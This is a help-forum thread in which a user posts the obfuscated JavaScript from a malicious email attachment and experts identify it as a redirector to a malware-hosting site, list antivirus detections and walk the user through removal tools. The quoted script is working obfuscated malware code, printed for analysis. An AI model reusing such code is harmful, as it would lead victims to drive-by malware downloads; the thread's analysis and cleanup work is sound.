Solved

Does Anyone Know This Malicious Attachment

Posted on 2010-09-20
20
1,037 Views
Last Modified: 2013-11-22
Hi,

I just received one of those spam emails that had an attachment inside it from what looked like a person I recognised. The attachment was a not too unfamiliar report.html name and I opened it with firefox.

The attachment was a few lines of javascript which I have included below for reference and appear to be part of the jsunpack tool.

After clicking on the attacment, a line of text appeared in the browser along the lines of please wait a few seconds. At this point I right clicked the attachment and ran an AVG scan on it which reported Malware.

Additionally A window popped up which appeared to be Windows Firewall asking me if I wanted to block Windows Explorer. I clicked "Block" and then shutdown the computer.

I re-booted and all seems to be OK but the Windows Firewall message is displayed asking if I want to Keep Blocking Windows Explorer.

Does anyone understand the code below and know if this is a virus / trojan that I can find out what it does and try to remove it ? I have run a full AVG scan but it doesnt report a virus is present.

Many thanks

<script language="JavaScript" type="text/javascript">function bn6s(m0ga){var
lpr5,co7a="",idmu,s1d5="goac>tep \":/;iv=b-nq.rhfuxm0sl<",os9w,yvsg=s1d5.length;eval(unescape("%66un%63ti%6Fn b%7677%28jn%63v){%63o7%61+=%6Ancv%7D"));for(os9w=0;os9w<m0ga.length;os9w++){idmu=m0ga.charAt(os9w);lpr5=s1d5.indexOf(idmu);if(lpr5>-1){lpr5-=(os9w+1)%yvsg;if(lpr5<0){lpr5+=yvsg;}bv77(s1d5.charAt(lpr5));}else{bv77(idmu);}}eval(unescape("%64oc%75me%6Et.w%72it%65(c%6F7a)%3Bco%37a=%22%22;"));}bn6s("gs\"\"pvliv-snops<o0\"mi;lrb>>g<-tp. qvaqo< mcnqhmslere.ll=oa-<.g;0fm:ot--r=");</script><noscript>To display this page you need a browser that supports JavaScript.</noscript>
0
Comment
Question by:ls21gce
  • 7
  • 5
  • 3
  • +3
20 Comments
 
LVL 7

Expert Comment

by:JohnThePro
ID: 33718140
Hard to say for sure exactly what it does.

It appears to use some encryption.
0
 
LVL 7

Expert Comment

by:JohnThePro
ID: 33718145
On a side-note,

Go to Google and download MalwareBytes Anti-Malware, their free version. Install it, and run a scan with it. I bet it finds something.
0
 
LVL 8

Expert Comment

by:hello_everybody
ID: 33718767
It will direct you to: http://nobletree.org/x.html (that specific page doesn't exist, but the website does).

I hope that helps!
0
 
LVL 7

Expert Comment

by:JohnThePro
ID: 33718959
0
 
LVL 26

Expert Comment

by:Thomas Zucker-Scharff
ID: 33718968
0
 

Author Comment

by:ls21gce
ID: 33719438
What is this nobletree.org website about ? I clicked on this but it is some kind of investments website ?
Is there really a guy on here masquerading as a "Master" just to send people to his investments site ?
0
 
LVL 26

Expert Comment

by:Thomas Zucker-Scharff
ID: 33719705
As I said don't go there.  What ever the site is, it isn't worth endangering your computer/identity over.  Whenever you have a questionable website, if youdon't use a link checker like linkextender, AVG link checker, or Web of Trust, use F-secure's URL checker:

https://browsingprotectionbeta.f-secure.com/swp/home
0
 

Author Comment

by:ls21gce
ID: 33719944
Can I just recap on your view of this embedded javascript code...

By opening this code in a browser, it will not have been able to deposit any sort of "payload" onto my computer in the form of virus etc. Instead it is a harmless re-direction to some kind of investments website in an attempt to gather business ?

Thanks
0
 
LVL 26

Expert Comment

by:Thomas Zucker-Scharff
ID: 33719973
It is a redirection to that site, but according to the f-secure site it is anything BUT harmless - beware of a payload from that site.
0
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33720590
I have saved the above said code into a file and uploaded to Virustotal.com and it reported that atleast 9 antivirus vendor found this code suspicious. Here are the ones which have detected the virus:

Authentium    5.2.0.5    2010.09.20    HTML/Redir.C
ClamAV    0.96.2.0-git    2010.09.20    JS.Generic
F-Prot    4.6.2.117    2010.09.20    HTML/Redir.C
Kaspersky    7.0.0.125    2010.09.20    Trojan-Downloader.JS.Small.ov
Microsoft    1.6201    2010.09.20    VirTool:JS/Obfuscator.W
NOD32    5465    2010.09.20    JS/Redirector.NAU
PCTools    7.0.3.5    2010.09.20    Trojan.Webkit
Sophos    4.57.0    2010.09.20    JS/WndRed-B
VirusBuster    12.65.16.0    2010.09.20    JS.Redirector.Gen.13

There is no detail information available on net.

http://www.securelist.com/en/descriptions/15411634/Trojan-Downloader.JS.Small.ov

Since you mentioned that AVG detected it so I think you are safe and no harmful files are downloaded to your computer.

Sudeep
0
Highfive Gives IT Their Time Back

Highfive is so simple that setting up every meeting room takes just minutes and every employee will be able to start or join a call from any room with ease. Never be called into a meeting just to get it started again. This is how video conferencing should work!

 

Author Comment

by:ls21gce
ID: 33720819
Hi Sudeep,

Thanks for your comments but I am not so confident that there was no harm done to my system.

What happened was that I received the message PLEASE WAITING 4 SECOND...
Then another window popped up which looked like it was from Windows Firewall asking me if I wanted to block Windows Explorer. I immediately clicked on the "Block" button thinking I was doing the right thing but I now suspect this was actually a fake screen designed to look like Windows Firewall and when I clicked I executed a payload. This was when my screen went blank and appeared to be scanning through files in DOS mode. I immediately executed a shutdown but this was likely to be too late.

I have re-booted my system and the same pop-up message appeared asking if I wanted to keep blocking Windows Explorer to which I clicked on "Keep Blocking" and all seems to be working OK but how can I tell if my computer or our network is now infected ?

I have executed an AVG virus scan which shows nothing.

0
 
LVL 29

Accepted Solution

by:
Sudeep Sharma earned 500 total points
ID: 33720840
Just to make sure the system is clean do following:

Try HitManpro to make sure anything which might be left behind is clean:
32bit
http://dl.surfright.nl/HitmanPro35.exe
http://download.cnet.com/Hitman-Pro-3/3000-2239_4-10895604.html

64bit
http://dl.surfright.nl/HitmanPro35_x64.exe

If issue is not resolved by these tools try TDSSKiller:
http://support.kaspersky.com/downloads/utils/tdsskiller.zip
http://support.kaspersky.com/downloads/utils/tdsskiller.exe

Tutorial on TDSSKiller:
http://support.kaspersky.com/viruses/solutions?qid=208280684

If this does not resolve your issue then try Combofix:

Download Combofix
http://download.bleepingcomputer.com/sUBs/ComboFix.exe
http://www.forospyware.com/sUBs/ComboFix.exe
http://subs.geekstogo.com/ComboFix.exe

Tutorial on how to use combofix:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

Post logs here for further analysis.

Sudeep
0
 

Author Comment

by:ls21gce
ID: 33721465
Hi Sudeep,

I have run all three of the tools you suggested. There were a further .exe files identified and removed that were not seen by AVG. They were a.exe created today in My Documents and what looked like the same program (by size) in Application Data/Tivy/apola.exe So it looks like this had deposited something onto my system but what it is and whether all instances are removed is another question. I am just not sure if I can trust my system any more as this appears to be a new threat. I cant find any reference to Tivy/apola on the net anywhere...Also it detected Variant.Kazy.711 which I can also not find.

I have also posted the logs as you suggested.

Many thanks
Combo-Fix-log.txt
Hitman-log.xml
TDSSKiller.2.4.2.1-20.09.2010-23.txt
0
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33728202
Could you please run Combofix one more time and paste the logs here?

Sudeep
0
 

Author Comment

by:ls21gce
ID: 33729314
Hi Sudeep,

I have now re-run the COMBOFIX Tool and the log of Run2 is attached

Thanks
Combo-Fix-log-Run2.txt
0
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33729848
Combofix logs above seems pretty clean to me. Are you still noticing any suspicious EXE anywhere in the system?

Even after reboot?

Sudeep
0
 

Author Comment

by:ls21gce
ID: 33730227
Hi Sudeep,

I am not noticing anything out of the ordinary, apart from the odd unexpected MS Outlook abend but I have an unnerving feeling almost paranoia that if I log into my online banking account or enter my credit card details that there might be an undetected trojan gathering the data to be sent to a rogue website somewhere.

I would certainly feel a lot happier if one of the big anti-virus companies tested this virus to find out what it is doing.

Do you think it will now be possible to trust this PC is clean and safe ?

Thanks
0
 
LVL 2

Expert Comment

by:waldosmx
ID: 33737486
Hi Is21gce, I recomend you start a topic here ;) geekstogo.com/forum/forum/37-virus-spyware-malware-removal/
0
 
LVL 29

Expert Comment

by:Sudeep Sharma
ID: 33737523
Since most of things are been removed I think you are good to go. However we could not say for sure if there is anything else which is left behind. But I must say you are in position now where you could easily take the backup of your system and do a clean install.

Sudeep
0
 

Author Closing Comment

by:ls21gce
ID: 33742709
Top Notch Advice !
0

Featured Post

Top 6 Sources for Identifying Threat Actor TTPs

Understanding your enemy is essential. These six sources will help you identify the most popular threat actor tactics, techniques, and procedures (TTPs).

Join & Write a Comment

Operating system developers such as Microsoft (https://www.microsoft.com) and Apple have made incredible strides in virus protection over the past decade. Operating systems come packaged with built in defensive tools such as virus protection and a f…
The term "Bad USB" is a buzz word that is usually used when talking about attacks on computer systems that involve USB devices. In this article, I will show what possibilities modern windows systems (win8.x and win10) offer to fight these attacks wi…
Sending a Secure fax is easy with eFax Corporate (http://www.enterprise.efax.com). First, Just open a new email message.  In the To field, type your recipient's fax number @efaxsend.com. You can even send a secure international fax — just include t…
This video discusses moving either the default database or any database to a new volume.

706 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

12 Experts available now in Live!

Get 1:1 Help Now